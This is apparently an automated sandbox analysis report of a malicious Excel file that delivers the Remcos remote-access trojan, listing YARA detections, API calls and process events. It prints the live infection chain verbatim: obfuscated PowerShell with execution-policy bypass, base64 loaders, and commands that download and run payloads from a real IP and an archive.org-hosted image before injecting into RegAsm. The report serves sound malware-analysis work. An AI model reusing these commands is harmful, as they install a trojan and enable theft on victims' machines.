Source: 14.2.powershell.exe.133a4b98.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.powershell.exe.133a4b98.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000E.00000002.443270991.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 3180, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2848, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 2848, type: MEMORYSTR | Matched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: powershell.exe PID: 2848, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3788, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTR | Matched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: RegAsm.exe PID: 4092, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winXLS@35/38@7/5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\A7130000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-CJ3HJ1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR7E05.tmp
Source: PO_304234.xls | OLE indicator, Workbook stream: true
Source: A7130000.0.dr | OLE indicator, Workbook stream: true
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\System32\mshta.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: PO_304234.xls | Virustotal: Detection: 19%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                  Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES89F7.tmp" "c:\Users\user\AppData\Local\Temp\imlwlgjg\CSCE8D62BF91CF49AAAEBCC2A37BB3C45C.TMP"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS"
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                  Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'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'+[cHAR]34+'))')))"
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'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'+[cHAR]34+'))')))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCDF9.tmp" "c:\Users\user\AppData\Local\Temp\mjo4tj0d\CSC1D7DFCB3A844EFFBAC81F2560943E20.TMP"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS"
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? 